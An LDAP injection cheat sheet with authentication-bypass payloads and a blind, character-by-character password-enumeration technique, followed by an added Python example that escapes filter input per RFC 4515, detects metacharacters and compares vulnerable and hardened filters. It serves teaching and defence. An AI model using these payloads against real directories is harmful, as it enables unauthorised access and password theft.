Basic LDAP Injection
# Classical request: (&(uid=)(userPassword=))
# So the result is TRUE only if both uid AND userPassword match
# You can put ')' in the request to break it and see the request (in the error)
username : *)(|(uid=*
password : )
→ (&(uid=*)(|(uid=*)(userPassword=)))
OR
username=*
password=*)(&
→ (&(uid=*)(userPassword=*)(&))
Blind LDAP Injection
# You have to find/imagine how the request is built
# Test using only a single char → OK → the request is (mail=*[text]*)
# You can try to get (mail=*)(sn=*) by injecting )(sn= → OK
# Then test the password attribute: (mail=*)(password=*) → OK
@*)(password=x → FALSE
@*)(password=d → TRUE
# You can then enumerate each char of the password this way
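The following is an added example, not part of the original cheat sheet: it builds the login filter assumed in the basic section, (&(uid=)(userPassword=)), and the search filter assumed in the blind section, (mail=*[text]*), once by naive concatenation and once with RFC 4515 escaping, and runs the notes' own payloads through both so the defender can see exactly what the escaping changes. The attribute names and templates come from the page; the function names, the node-count check and the metacharacter detector are assumptions made for this example.

```python
# Added example, not part of the original cheat sheet: the login filter the
# notes above assume, (&(uid=)(userPassword=)), and the blind-injection search
# filter (mail=*...*), each built once by naive concatenation and once with
# RFC 4515 escaping, so the notes' own payloads can be compared side by side.
# The attribute names and templates are taken from the page; the function
# names are assumptions made for this example.

# RFC 4515 section 3: characters that must be escaped inside an assertion value.
# Backslash is handled first so the escapes produced here are not re-escaped.
_ESCAPES = (
    ("\\", "\\5c"),
    ("*", "\\2a"),
    ("(", "\\28"),
    (")", "\\29"),
    ("\x00", "\\00"),
)


def escape_filter_value(value: str) -> str:
    """Escape one user-supplied assertion value per RFC 4515.

    Same effect as python-ldap's ldap.filter.escape_filter_chars() and
    ldap3's ldap3.utils.conv.escape_filter_chars(); written inline so the
    example runs without an LDAP library installed."""
    for raw, encoded in _ESCAPES:
        value = value.replace(raw, encoded)
    return value


def has_filter_metachars(value: str) -> bool:
    """Detection helper: True when an input carries filter syntax characters.
    Useful for logging or alerting on attempts like the ones in the notes."""
    return any(raw in value for raw, _ in _ESCAPES)


def unsafe_login_filter(username: str, password: str) -> str:
    """Vulnerable form: the classical request built by string concatenation."""
    return f"(&(uid={username})(userPassword={password}))"


def safe_login_filter(username: str, password: str) -> str:
    """Hardened form: every operand is escaped before it enters the filter."""
    return (f"(&(uid={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(password)}))")


def unsafe_mail_filter(text: str) -> str:
    """Vulnerable form of the blind-injection search: (mail=*[text]*)."""
    return f"(mail=*{text}*)"


def safe_mail_filter(text: str) -> str:
    """Hardened form: the template's own wildcards stay, the input's do not."""
    return f"(mail=*{escape_filter_value(text)}*)"


def filter_node_count(ldap_filter: str) -> int:
    """Count filter nodes (every '(' opens one). A fixed template must always
    produce the same count; a larger count means the input added structure."""
    return ldap_filter.count("(")


if __name__ == "__main__":
    # The payloads below are the ones written in the notes above.
    cases = [
        ("login", "*)(|(uid=*", ")"),
        ("login", "*", "*)(&"),
        ("mail", "@*)(password=d", ""),
    ]
    for kind, first, second in cases:
        if kind == "login":
            unsafe = unsafe_login_filter(first, second)
            safe = safe_login_filter(first, second)
        else:
            unsafe = unsafe_mail_filter(first)
            safe = safe_mail_filter(first)
        flagged = has_filter_metachars(first) or has_filter_metachars(second)
        print(f"unsafe ({filter_node_count(unsafe)} nodes): {unsafe}")
        print(f"safe   ({filter_node_count(safe)} nodes): {safe}")
        print(f"input contains filter metacharacters: {flagged}")
```

The node count is the quick structural check: the login template always has 3 nodes and the mail template 1, so any request whose count differs was shaped by the input. Escaping removes that possibility because `\28`, `\29` and `\2a` are literal bytes to the directory, not syntax; in real code use the library helper (python-ldap's `ldap.filter.filter_format`, or ldap3's `escape_filter_chars`) rather than a hand-rolled table. The blind enumeration in the notes also depends on `password=d*` being a legal prefix match against a searchable password attribute; escaping the `*` stops the prefix probe, and comparing credentials inside a search filter at all is the underlying design flaw, since a bind as the user is the operation the directory provides for that purpose.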